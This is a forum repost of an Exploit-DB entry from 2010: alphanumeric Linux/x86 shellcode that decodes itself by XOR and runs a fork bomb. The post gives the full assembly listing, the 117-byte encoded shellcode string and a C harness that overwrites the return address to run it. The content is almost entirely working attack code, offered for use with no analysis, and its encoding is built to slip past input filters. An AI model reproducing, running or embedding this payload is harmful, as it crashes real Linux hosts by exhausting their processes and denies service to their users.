Exploit Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13716
Проверка EDB
  1. Пройдено
Автор
AGIX
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2010-05-27
C:
/*
 | Title: Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
 | Type: Shellcode
 | Author: agix
 | Platform: Linux X86
*/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##################################                1
0                    I'm agix member from Inj3ct0r Team                1
1                    ##################################                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


/*
dec esp
        dec esp
        dec esp
        dec esp
        push dword 0x58494741
        pop eax
        xor eax, 0x58494741
        dec eax 
        pop edx
        push esp
        pop ecx 
        push eax
        push ecx
        push edx
        push eax
        push esp
        push ebp
        push edx
        push edi
        popad
        dec ecx
        push dword 0x45525649
        dec ecx
        xor [ecx], bh
        push word 0x5445
        pop dx
        xor [ecx], dh
        dec ecx
        xor [ecx], bh
        push word 0x4255
        pop dx
        xor[ecx], dh
        dec ecx
        xor [ecx], bh
        push word 0x3636
        pop dx
        xor [ecx], dh
        dec ecx
        push dword 0x6b6e756a
        xor [ecx], bh
        push word 0x5974
        pop dx
        xor [ecx], dh
        dec ecx
        push word 0x3636
        pop dx
        xor [ecx], dh
        dec ecx
        push word 0x776F
        pop dx
        xor [ecx], dh
        push esp
        push esi
        pop ecx
        xor [ecx + 116], bh
        push word 0x7065
        pop dx
        xor [ecx + 116], dh
        dec esp
*/


#include <stdio.h>

char shellcode[] =
"LLLLhAGIXX5AGIXHZTYPQRPTURWaIhIVREI09fhETfZ01I09fhUBfZ01I09fh66fZ01Ihjunk09fhtYfZ01Ifh66fZ01IfhowfZ01TVY0ytfhepfZ0qtL";


int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}
 
Источник
www.exploit-db.com

Похожие темы